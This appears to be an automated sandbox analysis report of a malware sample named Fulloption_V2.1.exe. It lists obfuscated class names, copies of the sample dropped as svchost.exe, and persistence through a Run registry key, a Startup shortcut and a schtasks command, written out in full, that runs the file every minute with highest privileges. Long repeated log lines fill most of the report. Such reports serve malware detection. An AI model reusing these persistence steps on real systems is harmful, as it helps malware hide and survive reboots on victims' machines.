Source: svchost.exe.3.dr, uP2b6O9KTPI4vnSI1dUR307wFVvyBMXKBkdiV3aZulCaIXtlxiT7MJP0PcYVqnbWEh1PpVH.cs	High entropy of concatenated method names: '_4whaG0NfKPgd4ZkMPVa3sLuuwMGAph72tU6zI98PGqCJTdmymoQcTnZTf7uN8dzPnKVaqOB', 'cqtQEUcKPRtCO0l3Z5D6iaCC07cz2j4TjhKqZFQd0jwPR6iksDjDyoLIHUXyVuU91PjKzGg', 'nEZIUUNa036X5AaNVDQ2ozCTqpobwqZBcDBhFiSps3BJLkNIzO9Pg4t4Yu3QgyRYiNfNQvp', 'VGK8JmHpQfVdpmGXNP69EueY8OYk3BTbErbV8X5Csk5QjVtzDU7exK36kFDWMqIRJp9QRU2', 'jj4xD19z5GpuhgD95bM5GWbbDSgqdv4GX5V0sD7P', 'uToy5TZO8ZswGteckj5ExX1O8MYhrSeG90gzz5Zn', 'hW5Qy1eLqYfN6p36MB0aPR73GuN5utyOdI2g0b1g', 'bvRYn6cDQsOaHDhNaYay3JXpX1PklhA1r6ovypM6', '_0Pvz8TeM8TOWTtLf3KI7iZGkSEUCGzFtz0X1OkPc', 'JnH4Y6npZxaMxVJmRRKJN8grWyPSGJ3ZZjqQLxVJ'
Source: svchost.exe.3.dr, QrEb9vEQK30TbzqrpPRS8gMxn9hcElerDl9JLkmyiIwgNpEMK2Koy.cs	High entropy of concatenated method names: 'nJ4pCkj81LCk8n9M8r0MuxIGdnZGl3UhEuz8KZazncDp52HQaHWaq', '_1WsMSTZltwhQ8Ljacv3qEnOxQyuZeLWnd9NghzytYRpDQebm5DCGJ', 'uWgWaB5JuiKDElvIH7DNHJAAjQfKtbbUVmMEA1FG6Ryv0EJL710ly', 'fDjOZD38dKxo9Qvg7Li01H0SaYYrlzAv4RczkgRf2FPDW0bP7MMLt', 'oqk4bCr5n4TPUhNHgAnAi19CtOzg9s5wT8wjOSoLYIJA6asLGz58A', 'fYft3dOnodl407XwgHbSuPsc0WF1m6PPk55FsMLiDDWwX10Vqenrm', 'EdRAkl5K2RTyRBJoBy8pC3XY3WVME84TvI7tXIlxdZpehprJkJ9oo', 'uribgpzGSIR1DWzCkWHN7sCiCbFioagrPLh5CjzaeGHWDOwTJFxw8', '_7Uvq2gvbpbOWQpewNW9TtAztXgGrGZ1Zkw3iHpJ0PEa7P67Zmr6R31hg7ZZDaJoNrXQLwkz3OybcHWg4FsSDOk', 'WJqvSELw67r8XXRJVpiS7TGH4nGN2gQ5b4aRlNM7d1VQxmVIrHJEelvBaciD9o8O5yHs5rOyFIZh2ek7o04NO7'
Source: svchost.exe.3.dr, HHjXEnOXMpZZX0t333rKZzttX3c0bCGrLWdWm8VpSuXC8NLbGmkV7.cs	High entropy of concatenated method names: 'Pn7KfKAyyOMB9Pxh2oUTavMs2mIlIVjOPRO2lVPNTdUKCqsrCu7Rw', '_0Wy8cULXkdC7gFDLqOEkoWZ', 'R0CPTb6Nt5KR1uU9gJU7bge', 'SIz1A0AO4szxhhh7r93Ktkc', '_1EVdRepVsmQc8aXYbNxJhsV'
Source: svchost.exe.3.dr, kODcMrMfbJsHKpWg5CMjXYUidOLklO3xTawO2wUujdr4ldH76Vph40oLvTg5q7hBmeg6qLH.cs	High entropy of concatenated method names: 'QLoIK6MQKZjSrX4c4Urrk8j1IJEZkRJzsaV5odMpkpsqnbGzoeibxctIRypNw3WG32idsDM', 'cTyY8LYhw8rJauQzbgRcncL1IAju3piSg7DsEzD7', 'sP0vEm0wuY3OgW7khbkQW6wsh50oo3Y3XCLYw5q4', 'blhGtCwY9J06zKYhJgaHA2I3GxJvOjIo5RXdBpEO', '_8JVR6RNsuQwmXdHgGw2fiXKBvlad0tKb2cFvJ1mz'
Source: svchost.exe.3.dr, WOPIrDqarnk5N4gzqAP25.cs	High entropy of concatenated method names: 'xoboGU6a1ItakvDvtzSPS', 'EhVpMT8GhwZpb01mGHvMU', '_0GifaBSmFVIn1n9GU4E0Y', '_0kDl49Cffw8kYkSs81KAV', 'OdrlfifM3gg31HIjeUXPp', 'R36sh6plTKMWM2lS0LJ6Y', 'PisVAydldAR5GNtCSQxnH', '_3QvDovLndaksT3UJQM35x', '_8EH1qNwMzZa7aGmGOc83k', '_1fpLGU6RLRAN4gi7eSHVa'
Source: svchost.exe.3.dr, gXAoWslK11sDEulOOoCTRJsFMBlrbikeZNbD.cs	High entropy of concatenated method names: 'VV1389fJAaw2xMLnzXDcLkTAWCYNTgGHa259', 'nllw1xMJI3tMcAbD2LMS7730GRBaKGc90xBh', 'ACFjARoWtcWCQ0pfVq4tkjPYbQiDXhY9aka2', 'LbzLCXyTfe7RmnKbSxX8GlKEyxcxAgdzQMur', 'VqjCXC6Je77iK61L90x5KUxjEnHkN8FKROzn', 'ukH5jJIaius70tje6nPoxgEz7ZfihLxNHIPz', 'eYGnoOsvEp9cK5llPRmQ3p7bpwwORYtXPjmk', 'j1NM555wUAdu9y59lVk5q94CntDdRNIxcx6E', 'TTO8yrgrAvaj8dGKwmb3H94DfPJhGoT92zah', 'Da3MybxiBo2Ybz1f3SlfIBtNgb6f6xAe99d5'
Source: svchost.exe.3.dr, bsoOrcxtCsk851ixhuJbDSFPCYOWKhOuZcfe6c8IbVN053jvRKVtRJyRf8XvEsEj2xHKhSE.cs	High entropy of concatenated method names: 'TMzGgVgQoxXYCRFfkMTai490uZGlUHLySUqT7Z2gQ0KnfedSjkB5yLmxCAnTaFn65mbTciy', 'uy94aOUEW6mC9', 'RgUy88j1EMNau', '_0MWOCNlw01UKe', 'y5wKvQZTM4bGH', 'Ub497o83BvnK5', 'NXfPr1Yvwda78', 'ryAb5ogeWmK1p', 'Yy4aahsIgvIB1', 'iwKahv22KUBQj'

Persistence and Installation Behavior

Drops PE files with benign system names

Source: C:\Users\user\Desktop\Fulloption_V2.1.exe	File created: C:\Users\user\AppData\Roaming\svchost.exe			Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exe	File created: C:\ProgramData\svchost.exe			Jump to dropped file

Source: C:\Users\user\Desktop\Fulloption_V2.1.exe	File created: C:\Users\user\AppData\Roaming\FullOption_2.1Xenos.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Fulloption_V2.1.exe	File created: C:\Users\user\AppData\Roaming\svchost.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\svchost.exe	File created: C:\ProgramData\svchost.exe	Jump to dropped file

Source: C:\Users\user\AppData\Roaming\svchost.exe

File created: C:\ProgramData\svchost.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Roaming\svchost.exe

Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\ProgramData\svchost.exe"

Source: C:\Users\user\AppData\Roaming\svchost.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk

Source: C:\Users\user\AppData\Roaming\svchost.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk

Loading BitLocker PowerShell Module

Source: C:\Users\user\AppData\Roaming\svchost.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchost			Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchost			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\Fulloption_V2.1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fulloption_V2.1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fulloption_V2.1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fulloption_V2.1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fulloption_V2.1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fulloption_V2.1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fulloption_V2.1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fulloption_V2.1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fulloption_V2.1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fulloption_V2.1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fulloption_V2.1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fulloption_V2.1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fulloption_V2.1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fulloption_V2.1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fulloption_V2.1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fulloption_V2.1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fulloption_V2.1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fulloption_V2.1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Fulloption_V2.1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
